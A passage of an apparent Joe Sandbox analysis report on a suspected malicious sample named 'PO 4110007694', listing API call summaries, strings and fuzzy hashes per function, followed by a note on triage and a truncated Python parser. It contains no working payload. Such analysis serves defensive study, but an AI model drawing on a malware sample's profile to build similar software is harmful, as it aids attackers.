                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C6C3F1
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00C6C3FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
                                                                    • Instruction ID: 82f504fec960139547a6b606f787f5e1bb495d80a729cbe3ad4a40b37fe0b607
                                                                    • Opcode Fuzzy Hash: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
                                                                    • Instruction Fuzzy Hash: 54510D71B00205AFDB18CFA9DD99BBEBBBAEB88711F14813DF515D62A0D7709E418B10
                                                                    APIs
                                                                      • Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A
                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C120D3
                                                                    • KillTimer.USER32(-00000001,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C1216E
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00C4BCA6
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCD7
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCEE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BD0A
                                                                    • DeleteObject.GDI32(00000000), ref: 00C4BD1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
                                                                    • Instruction ID: 24f79d6f68c319f62b6e8cd6432ac928e95babac0462a13d0fa32d95f7bee595
                                                                    • Opcode Fuzzy Hash: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
                                                                    • Instruction Fuzzy Hash: 6A619B34501A00DFCB359F15DD88B69B7F2FB45312F20856EE5528AAA4C770ADA1FB80
                                                                    APIs
                                                                      • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                    • GetSysColor.USER32(0000000F), ref: 00C121D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
                                                                    • Instruction ID: 85a49d7e060e94c0bea44fd2aa3933d770899632d10ff960970d089abf637bf8
                                                                    • Opcode Fuzzy Hash: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
                                                                    • Instruction Fuzzy Hash: C2418F35100140EBDB255F28EC88BFD3B65EB47331F28426AFE658A1E5C7318D92EB61
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,00C9F910), ref: 00C7A90B
                                                                    • GetDriveTypeW.KERNEL32(00000061,00CC89A0,00000061), ref: 00C7A9D5
                                                                    • _wcscpy.LIBCMT ref: 00C7A9FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2820617543-1000479233
                                                                    • Opcode ID: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
                                                                    • Instruction ID: ca95541d658f73b23627103ebd55a48fe4c487ad4d4c735071c4787c610e3743
                                                                    • Opcode Fuzzy Hash: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
                                                                    • Instruction Fuzzy Hash: 8751AE311183019BC704EF14D8A2AAFB7A5EFC5710F14882DF59A972A2DB31DA49EB53
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __i64tow__itow__swprintf
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 421087845-2263619337
                                                                    • Opcode ID: cdcaef33ba3717b619f9fa2846284e11381362694841a317cdf4fad9f29706d8
                                                                    • Instruction ID: 90a6e7e6cf254e6cfe04e144b4a681ba34e2067811ab712a96235cc840c984a0
                                                                    • Opcode Fuzzy Hash: cdcaef33ba3717b619f9fa2846284e11381362694841a317cdf4fad9f29706d8
                                                                    • Instruction Fuzzy Hash: BA41E671510205AFEB24DF35D852EBAB7F8FF46300F20447EE559D7291EA319A42EB10
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C9716A
                                                                    • CreateMenu.USER32 ref: 00C97185
                                                                    • SetMenu.USER32(?,00000000), ref: 00C97194
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97221
                                                                    • IsMenu.USER32(?), ref: 00C97237
                                                                    • CreatePopupMenu.USER32 ref: 00C97241
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C9726E
                                                                    • DrawMenuBar.USER32 ref: 00C97276
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                    • String ID: 0$F
                                                                    • API String ID: 176399719-3044882817
                                                                    • Opcode ID: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
                                                                    • Instruction ID: 6ea67be89d96d979000809f5546716ebfc17d6ba7230bd5a62b1c353d4564f31
                                                                    • Opcode Fuzzy Hash: 8bb907e3f842f75661f522204bb4e4e5bc08cbaa0c3068452ccc0e8385d14ae6
                                                                    • Instruction Fuzzy Hash: F6414574A22205EFDF20DFA4D888F9ABBB5FF09310F14016AF915A7361D731AA10DB90
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C9755E
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00C97565
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C97578
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C97580
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C9758B
                                                                    • DeleteDC.GDI32(00000000), ref: 00C97594
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00C9759E
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C975B2
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C975BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 62a89cedb5f36695f89bcac6bd6aaed9b59f734202fce06b23bc89367c338710
                                                                    • Instruction ID: dc14745a7dddd301b5834db2ea5fd10c4d3492422d18e9daf2b1e6ac919f5397
                                                                    • Opcode Fuzzy Hash: 62a89cedb5f36695f89bcac6bd6aaed9b59f734202fce06b23bc89367c338710
                                                                    • Instruction Fuzzy Hash: 54314972115215ABDF129F64DC0DFDA3B69EF09320F16422AFA25D60A0C731D922DBA4
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C36E3E
                                                                      • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                    • __gmtime64_s.LIBCMT ref: 00C36ED7
                                                                    • __gmtime64_s.LIBCMT ref: 00C36F0D
                                                                    • __gmtime64_s.LIBCMT ref: 00C36F2A
                                                                    • __allrem.LIBCMT ref: 00C36F80
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36F9C
                                                                    • __allrem.LIBCMT ref: 00C36FB3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36FD1
                                                                    • __allrem.LIBCMT ref: 00C36FE8
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C37006
                                                                    • __invoke_watson.LIBCMT ref: 00C37077
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction ID: 39d58285309a8225afa1539621e628fc408ee6ae77fd11c2fb0ef0128713b281
                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction Fuzzy Hash: DE7117B6A10717BBD728EF68DC81B5AB7B8BF04324F148229F524D7281E770DE049B90
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72542
                                                                    • GetMenuItemInfoW.USER32(00CD5890,000000FF,00000000,00000030), ref: 00C725A3
                                                                    • SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C725D9
                                                                    • Sleep.KERNEL32(000001F4), ref: 00C725EB
                                                                    • GetMenuItemCount.USER32(?), ref: 00C7262F
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00C7264B
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00C72675
                                                                    • GetMenuItemID.USER32(?,?), ref: 00C726BA
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C72700
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72714
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72735
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
                                                                    • Instruction ID: ffd3ce9ddfb44e63c29987fca832b21150604a1e332b86dbe0d8493da0be9eef
                                                                    • Opcode Fuzzy Hash: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
                                                                    • Instruction Fuzzy Hash: 8061BF70900249AFDF25CF64DD88EBEBBB8FB05304F14805AF865A3251D731AE46EB20
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C96FA5
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C96FA8
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C96FCC
                                                                    • _memset.LIBCMT ref: 00C96FDD
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C96FEF
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C97067
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
                                                                    • Instruction ID: 405f1b5d1f7a464833edfea3e48507653b656475ffa52ff7a75a2c5201292ebc
                                                                    • Opcode Fuzzy Hash: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
                                                                    • Instruction Fuzzy Hash: 22615A75900208AFDB11DFA4CC85FEE77B8EB09710F14419AFA15AB2A1C771AE45DB90
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C66BBF
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00C66C18
                                                                    • VariantInit.OLEAUT32(?), ref: 00C66C2A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C66C4A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00C66C9D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C66CB1
                                                                    • VariantClear.OLEAUT32(?), ref: 00C66CC6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00C66CD3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CDC
                                                                    • VariantClear.OLEAUT32(?), ref: 00C66CEE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
                                                                    • Instruction ID: 6719e8a3cf979ddbcc031151d6057daf3f4377c2eb6b7983b676beb900744bc0
                                                                    • Opcode Fuzzy Hash: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
                                                                    • Instruction Fuzzy Hash: 36414475A00119AFCF10DF65D888AEEBBB9EF48354F008069E955E7261CB30EA46DF90
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • CoInitialize.OLE32 ref: 00C88403
                                                                    • CoUninitialize.OLE32 ref: 00C8840E
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00CA2BEC,?), ref: 00C8846E
                                                                    • IIDFromString.OLE32(?,?), ref: 00C884E1
                                                                    • VariantInit.OLEAUT32(?), ref: 00C8857B
                                                                    • VariantClear.OLEAUT32(?), ref: 00C885DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 2fe89682371840b3fc8ca1e3839829c6d8e755a4c2bf9b2e53152684ae57b391
                                                                    • Instruction ID: 0327b81276999b9a79c8ecd8848670e6f74af6ebab5751058ed433c3b972f514
                                                                    • Opcode Fuzzy Hash: 2fe89682371840b3fc8ca1e3839829c6d8e755a4c2bf9b2e53152684ae57b391
                                                                    • Instruction Fuzzy Hash: E061BD716083129FD710EF14C858F6EB7E8AF86718F40481DF9829B691CB70EE48DB96
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00C85793
                                                                    • inet_addr.WSOCK32(?,?,?), ref: 00C857D8
                                                                    • gethostbyname.WSOCK32(?), ref: 00C857E4
                                                                    • IcmpCreateFile.IPHLPAPI ref: 00C857F2
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85862
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85878
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C858ED
                                                                    • WSACleanup.WSOCK32 ref: 00C858F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: a9e35f50c85941bac84ec24a4c0828fb6e27a6e068cdc6233c94e9f321fdf252
                                                                    • Instruction ID: 1eed7e33e6dc99007f84f3ad88ee55f717e54cb4ba4a1d9f3b3db12cfe071cab
                                                                    • Opcode Fuzzy Hash: a9e35f50c85941bac84ec24a4c0828fb6e27a6e068cdc6233c94e9f321fdf252
                                                                    • Instruction Fuzzy Hash: 3D51BE31644600DFDB20EF25CC89B6A77E4EF49314F04852AF966DB2E1DB70E941EB46
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00C7B4D0
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C7B546
                                                                    • GetLastError.KERNEL32 ref: 00C7B550
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00C7B5BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
                                                                    • Instruction ID: f7f77f8eea6d9cc993c67964a98505a5c80b130b44ca8819d0a2c712fd44a18f
                                                                    • Opcode Fuzzy Hash: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
                                                                    • Instruction Fuzzy Hash: E6318135A00205DFCB40EBA8C895FAEBBB4FF45310F10816AE519D7291DB719E46DB91
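The function blocks on this page are what an analyst pivots on when triaging the report: the API list under "APIs" shows which runtime routine a behaviour signature came from, the "String ID" field carries the string references the plugin attached to that function, and the "Similarity" fields (API ID, API String ID, fuzzy hashes) are the values to match against other reports. The following is an added example, not Joe Sandbox code: a parser for the block format as it appears on this page. The grammar is inferred from these lines; the two blocks in SAMPLE are copied from the report (the ICMP "Ping" helper and one of the ComboBox/ListBox SendMessageW helpers), abridged and with the indentation removed. The triage tag names and API sets in PATTERNS are the example's own assumptions, not Joe Sandbox signature names.

```python
"""Parser for the per-function summary blocks the Joe Sandbox IDA plugin emits
(the "APIs / Memory Dump Source / Similarity" sections of this report).
Added example, not Joe Sandbox code: the grammar is inferred from the lines on
this page, and SAMPLE holds two blocks copied from the report, abridged."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00C85793
• IcmpCreateFile.IPHLPAPI ref: 00C857F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85862
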